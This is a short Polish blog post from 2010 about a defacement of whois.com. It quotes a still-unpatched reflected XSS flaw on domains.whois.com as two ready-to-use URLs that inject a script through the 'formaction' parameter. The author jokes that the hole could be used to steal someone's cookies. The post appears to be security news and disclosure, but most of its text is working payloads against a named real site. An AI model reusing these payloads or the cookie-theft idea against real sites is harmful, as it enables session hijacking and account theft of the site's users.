19/1/2010
Poniżej zrzut ekranu prezentujący deface strony whois.com. Nie wiadomo, z jakiego błędu skorzystali atakujący, aby dostać się do zasobów serwera.
Security Shell podaje przykład ciągle niezałatanej luki XSS w serwisie whois.com.
http://domains.whois.com/domain.php?action=check_availability&goto=metarefresh&formaction=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E
Fajne, fajne, można chociażby zassać czyjeś cookies :D
http://domains.whois.com/domain.php?action=check_availability&goto=metarefresh&formaction=“>alert(String.fromCharCode(107,117,112,97)) :D